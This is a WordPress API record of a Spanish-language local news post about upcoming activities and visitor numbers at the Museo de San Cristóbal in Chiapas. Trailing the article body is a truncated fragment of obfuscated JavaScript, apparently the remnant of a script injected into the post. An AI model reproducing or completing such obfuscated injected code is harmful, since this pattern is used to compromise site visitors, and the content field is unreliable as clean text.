{"id":3636,"date":"2022-07-15T01:28:13","date_gmt":"2022-07-15T01:28:13","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=3636"},"modified":"2022-07-15T01:28:14","modified_gmt":"2022-07-15T01:28:14","slug":"realizaran-actividades-en-el-musac","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=3636","title":{"rendered":"Realizar\u00e1n actividades en el Musac"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/IMG-20220713-WA0204-1024x768.jpg\" alt=\"\" class=\"wp-image-3637\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/IMG-20220713-WA0204-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/IMG-20220713-WA0204-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/IMG-20220713-WA0204-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2022\/07\/IMG-20220713-WA0204.jpg 1280w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>\u00d3scar G\u00f3mez<\/p>\n\n\n\n<p>San Crist\u00f3bal de Las Casas.- La directora del Museo de San Crist\u00f3bal (Musac), Alethia D\u00edaz, anunci\u00f3 que el mes de agosto se tiene programada una serie de actividades en, lo cual ser\u00e1 un atractivo m\u00e1s para los visitantes que llegan a la ciudad en esta temporada, se\u00f1al\u00f3 de este recinto,.<\/p>\n\n\n\n<p>\u201cDel 31 de julio al 7 de agosto vamos a tener en el corredor frontal la Feria del Dulce Artesanal, posteriormente, no doy fechas exactas porque nos faltan confirmarlas, pero vamos a tener una exposici\u00f3n del Ej\u00e9rcito Mexicano de fotograf\u00edas, tambi\u00e9n en el corredor frontal, habr\u00e1 una venta literaria en el Parque de los Arcos y vamos a tener a los 32 representantes de los Colegios de Bachilleres de todos los estados\u201d, dijo.<\/p>\n\n\n\n<p>Coment\u00f3 que el Musac se encuentra vierto desde el 28 de junio y a la fecha tienen un promedio de entre 60 y 70 visitantes diarios, ya que el d\u00eda que menos asistencia han registrado fue el 12 de julio con 50, pero el domingo 10 de julio fueron 286, que fue el d\u00eda con m\u00e1s visitantes, por lo que espera en la temporada vacacional, la cifra incremente.<\/p>\n\n\n\n<p>Se\u00f1al\u00f3 que el espacio empieza a activarse poco a poco y todo aquel que tenga una propuesta, \u00fanicamente piden un oficio de solicitud, \u201ces para que podamos apartarlo, m\u00e1s que por cualquier otra cosa, nos han solicitado para exhibiciones, que van estar a finales de agosto, los artistas locales pueden venir y solicitarnos los espacios\u201d.<\/p>\n\n\n\n<p>\u201cTodas las actividades son gratuitas, pueden venir a disfrutar el espacio, los domingos cada 15 d\u00edas se hace un taller de silla de ruedas activa, est\u00e1n ense\u00f1ando a personas que la necesitan y a las personas que no la necesitan pero quieren sensibilizarse en el tema, ense\u00f1an c\u00f3mo subir rampas, escaleras, c\u00f3mo usar las sillas en general\u201d, agreg\u00f3.<\/p>\n\n\n\n<p>\u201cViene la temporada alta y esperamos que aumente, en agosto es el mes que m\u00e1s tenemos reservado, esperamos que se llene y tengamos muchos visitantes\u201d, finaliz\u00f3.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>\u00d3scar G\u00f3mez San Crist\u00f3bal de Las Casas.- La directora del Museo de San Crist\u00f3bal (Musac), Alethia D\u00edaz, anunci\u00f3 que el mes de agosto se tiene programada una serie de actividades en, lo cual ser\u00e1 un atractivo m\u00e1s para los visitantes que llegan a la ciudad en esta temporada, se\u00f1al\u00f3 de este recinto,. \u201cDel 31 de &hellip;<\/p>\n","protected":false},"author":2,"featured_media":3637,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7],"tags":[],"class_list":["post-3636","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-chiapas"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3636","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3636"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3636\/revisions"}],"predecessor-version":[{"id":3638,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/3636\/revisions\/3638"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/3637"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3636"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3636"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3636"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}